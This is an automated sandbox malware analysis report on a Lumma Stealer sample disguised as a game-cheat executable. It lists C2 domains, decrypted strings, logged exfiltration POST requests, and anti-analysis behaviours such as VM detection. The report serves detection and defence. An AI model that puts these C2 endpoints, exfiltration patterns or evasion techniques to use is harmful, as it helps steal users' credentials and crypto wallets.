Windows Analysis Report
MilkaCheats.exe

Overview

General Information

Sample name: MilkaCheats.exe
Analysis ID: 1543311
MD5: 906c60b268404ecda308e2692a3aaaf8
SHA1: e5405c09314a48cf035806f1b0a4cddd89df04d5
SHA256: 91a240e27b2849592fea2a6f326afedfc77c60d480126f5f9c57653a889b3dcf
Tags: exe, user-4k95m
Infos:

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • MilkaCheats.exe (PID: 6232 cmdline: "C:\Users\user\Desktop\MilkaCheats.exe" MD5: 906C60B268404ECDA308E2692A3AAAF8)
    • MilkaCheats.exe (PID: 6428 cmdline: "C:\Users\user\Desktop\MilkaCheats.exe" MD5: 906C60B268404ECDA308E2692A3AAAF8)
    • WerFault.exe (PID: 4584 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6232 -s 232 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs: (empty)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

{"C2 url": ["presticitpo.store", "messejawu.store", "founpiuer.store", "scriptyprefej.store", "crisiwarny.store", "necklacedmny.store", "fadehairucw.store", "thumbystriw.store", "navygenerayk.store"], "Build id": "yau6Na--5574340625"}

Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
00000001.00000003.1726270504.0000000001342000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000001.00000003.1768149959.0000000001342000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: MilkaCheats.exe PID: 6428 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
Process Memory Space: MilkaCheats.exe PID: 6428 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: MilkaCheats.exe PID: 6428 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-27T16:44:59.376608+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49730 | 172.67.170.64 | 443 | TCP
2024-10-27T16:45:01.669879+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49732 | 172.67.170.64 | 443 | TCP
2024-10-27T16:45:15.310166+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49748 | 172.67.170.64 | 443 | TCP
2024-10-27T16:44:59.376608+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49730 | 172.67.170.64 | 443 | TCP
2024-10-27T16:45:01.669879+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.4 | 49732 | 172.67.170.64 | 443 | TCP
2024-10-27T16:45:09.623341+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 172.67.170.64 | 443 | TCP
2024-10-27T16:45:10.787252+0100 | 2843864 | 1 | A Network Trojan was detected | 192.168.2.4 | 49743 | 172.67.170.64 | 443 | TCP

AV Detection

Source: MilkaCheats.exe | Avira: detected
Source: 1.2.MilkaCheats.exe.400000.1.raw.unpack | Malware Configuration Extractor: LummaC {"C2 url": ["presticitpo.store", "messejawu.store", "founpiuer.store", "scriptyprefej.store", "crisiwarny.store", "necklacedmny.store", "fadehairucw.store", "thumbystriw.store", "navygenerayk.store"], "Build id": "yau6Na--5574340625"}
Source: Submited Sample | Integrated Neural Analysis Model: Matched 94.1% probability
Source: MilkaCheats.exe | Joe Sandbox ML: detected
Source: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp | String decryptor:
  scriptyprefej.store
  navygenerayk.store
  founpiuer.store
  necklacedmny.store
  thumbystriw.store
  fadehairucw.store
  crisiwarny.store
  presticitpo.store
  messejawu.store
  lid=%s&j=%s&ver=4.0
  TeslaBrowser/5.5
  - Screen Resoluton:
  - Physical Installed Memory:
  Workgroup: -
  yau6Na--5574340625
Source: MilkaCheats.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: MilkaCheats.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\MilkaCheats.exe | Code function: 0_2_000DB239 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_000DB239
Source: C:\Users\user\Desktop\MilkaCheats.exe | File opened: C:\Users\user\AppData\Local\PlaceholderTileLogoFolder
Source: C:\Users\user\Desktop\MilkaCheats.exe | File opened: C:\Users\user\AppData\Local\Comms
Source: C:\Users\user\Desktop\MilkaCheats.exe | File opened: C:\Users\user\AppData\Local\Google
Source: C:\Users\user\Desktop\MilkaCheats.exe | File opened: C:\Users\user\AppData\Local\Packages
Source: C:\Users\user\Desktop\MilkaCheats.exe | File opened: C:\Users\user\AppData\Local\Mozilla
Source: C:\Users\user\Desktop\MilkaCheats.exe | File opened: C:\Users\user\AppData\Local\PeerDistRepub

Networking

Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 172.67.170.64:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 172.67.170.64:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49732 -> 172.67.170.64:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49732 -> 172.67.170.64:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49741 -> 172.67.170.64:443
Source: Network traffic | Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49743 -> 172.67.170.64:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49748 -> 172.67.170.64:443
Source: Joe Sandbox View | IP Address: 172.67.170.64
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: crisiwarny.store
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 52 | Host: crisiwarny.store
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 18168 | Host: crisiwarny.store
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8789 | Host: crisiwarny.store
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20442 | Host: crisiwarny.store
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1288 | Host: crisiwarny.store
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 584404 | Host: crisiwarny.store
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 87 | Host: crisiwarny.store
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: messejawu.store
Source: global traffic | DNS traffic detected: DNS query: presticitpo.store
Source: global traffic | DNS traffic detected: DNS query: crisiwarny.store
Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: crisiwarny.store
              Source: MilkaCheats.exe, 00000001.00000003.1712714034.0000000003A19000.00000004.00000800.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1712657900.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1712792463.0000000003A19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: MilkaCheats.exe, 00000001.00000003.1712714034.0000000003A19000.00000004.00000800.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1712657900.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1712792463.0000000003A19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: MilkaCheats.exe, 00000001.00000003.1712714034.0000000003A19000.00000004.00000800.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1712657900.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1712792463.0000000003A19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: MilkaCheats.exe, 00000001.00000003.1751292403.000000000136A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
              Source: MilkaCheats.exe, 00000001.00000003.1712448019.0000000003A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
              Source: MilkaCheats.exe, 00000001.00000003.1750884533.0000000003AF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: MilkaCheats.exe, 00000001.00000003.1750884533.0000000003AF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: MilkaCheats.exe, 00000001.00000003.1712448019.0000000003A2E000.00000004.00000800.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1712503562.0000000003A27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: MilkaCheats.exe, 00000001.00000003.1712503562.0000000003A02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
              Source: MilkaCheats.exe, 00000001.00000003.1712448019.0000000003A2E000.00000004.00000800.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1712503562.0000000003A27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: MilkaCheats.exe, 00000001.00000003.1712503562.0000000003A02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
              Source: MilkaCheats.exe, 00000001.00000003.1751292403.000000000136A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
              Source: MilkaCheats.exe, 00000001.00000003.1712714034.0000000003A19000.00000004.00000800.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1712657900.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1712792463.0000000003A19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: MilkaCheats.exe, 00000001.00000003.1751292403.000000000136A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
              Source: MilkaCheats.exe, 00000001.00000003.1712714034.0000000003A19000.00000004.00000800.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1712657900.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1712792463.0000000003A19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: MilkaCheats.exe, 00000001.00000003.1750884533.0000000003AF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: MilkaCheats.exe, 00000001.00000003.1750884533.0000000003AF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: MilkaCheats.exe, 00000001.00000003.1750884533.0000000003AF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: MilkaCheats.exe, 00000001.00000003.1750884533.0000000003AF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: MilkaCheats.exe, 00000001.00000003.1750884533.0000000003AF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: String function: 000C79D0 appears 54 times
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: String function: 000FACA0 appears 99 times
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: String function: 000FC5A0 appears 152 times
              Source: C:\Users\user\Desktop\MilkaCheats.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6232 -s 232
              Source: MilkaCheats.exe, 00000000.00000000.1664737880.0000000000144000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamePrint.Exej% vs MilkaCheats.exe
              Source: MilkaCheats.exe, 00000001.00000003.1672593382.0000000001213000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePrint.Exej% vs MilkaCheats.exe
              Source: MilkaCheats.exe, 00000001.00000002.1848002832.0000000000144000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamePrint.Exej% vs MilkaCheats.exe
              Source: MilkaCheats.exeBinary or memory string: OriginalFilenamePrint.Exej% vs MilkaCheats.exe
              Source: MilkaCheats.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: MilkaCheats.exeStatic PE information: Section: .data ZLIB complexity 0.9909225074962519
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/6@3/1
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile created: C:\Users\user\Desktop\static.lib
              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6232
              Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\137f0f92-02a8-442e-ba3f-dee856a53db1
              Source: C:\Users\user\Desktop\MilkaCheats.exeCommand line argument: Window10_2_000C59D6
              Source: C:\Users\user\Desktop\MilkaCheats.exeCommand line argument: static.lib0_2_000C59D6
              Source: MilkaCheats.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\MilkaCheats.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: MilkaCheats.exe, 00000001.00000003.1712714034.00000000039EB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: MilkaCheats.exeString found in binary or memory: "app.update.lastUpdateTime.recipe-client-addon-run", 1696333830); user_pref("app.update.lastUpdateTime.region-update-timer", 0); user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856); user_pref("app.update.lastUpdateTime.xpi-signatur
              Source: MilkaCheats.exeString found in binary or memory: p.update.lastUpdateTime.recipe-client-addon-run", 1696333830); user_pref("app.update.lastUpdateTime.region-update-timer", 0); user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856); user_pref("app.update.lastUpdateTime.xpi-signature-v
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile read: C:\Users\user\Desktop\MilkaCheats.exe
              Source: unknownProcess created: C:\Users\user\Desktop\MilkaCheats.exe "C:\Users\user\Desktop\MilkaCheats.exe"
              Source: C:\Users\user\Desktop\MilkaCheats.exeProcess created: C:\Users\user\Desktop\MilkaCheats.exe "C:\Users\user\Desktop\MilkaCheats.exe"
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: apphelp.dll
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: winhttp.dll
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: webio.dll
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: mswsock.dll
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: iphlpapi.dll
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: winnsi.dll
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: sspicli.dll
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: dnsapi.dll
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: rasadhlp.dll
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: fwpuclnt.dll
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: schannel.dll
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: mskeyprotect.dll
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: ntasn1.dll
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: ncrypt.dll
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: ncryptsslp.dll
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: msasn1.dll
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: gpapi.dll
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: dpapi.dll
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: wbemcomn.dll
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: amsi.dll
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: userenv.dll
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: profapi.dll
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: version.dll
              Source: MilkaCheats.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: MilkaCheats.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: MilkaCheats.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: MilkaCheats.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: MilkaCheats.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: MilkaCheats.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: MilkaCheats.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: MilkaCheats.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: MilkaCheats.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: MilkaCheats.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: MilkaCheats.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: MilkaCheats.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_0012CA60 push eax; mov dword ptr [esp], F4F5F6F7h0_2_0012CA6E
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_000C6B5A push ecx; ret 0_2_000C6B6D
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_000C511C push eax; ret 0_2_000C517C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_013498A1 push ss; retf 1_3_013498A2
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01345899 push cs; retf 1_3_0134589A
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_0134D889 push ds; ret 1_3_0134D88A
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01371423 push cs; retf 1_3_0137142D
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370D9C push esi; retf 0020h1_3_01370F93
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370F5C push esi; retf 0020h1_3_01370F93
              Source: C:\Users\user\Desktop\MilkaCheats.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
              Source: C:\Users\user\Desktop\MilkaCheats.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
              Source: C:\Users\user\Desktop\MilkaCheats.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\MilkaCheats.exeSystem information queried: FirmwareTableInformation
              Source: C:\Users\user\Desktop\MilkaCheats.exeAPI coverage: 6.2 %
              Source: C:\Users\user\Desktop\MilkaCheats.exe TID: 6572Thread sleep time: -150000s >= -30000s
              Source: C:\Users\user\Desktop\MilkaCheats.exe TID: 6548Thread sleep time: -30000s >= -30000s
              Source: C:\Users\user\Desktop\MilkaCheats.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_000DB239 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_000DB239
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\PlaceholderTileLogoFolder
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Comms
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Google
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Packages
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\Mozilla
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\PeerDistRepub
              Source: Amcache.hve.4.drBinary or memory string: VMware
              Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
              Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
              Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
              Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
              Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
              Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
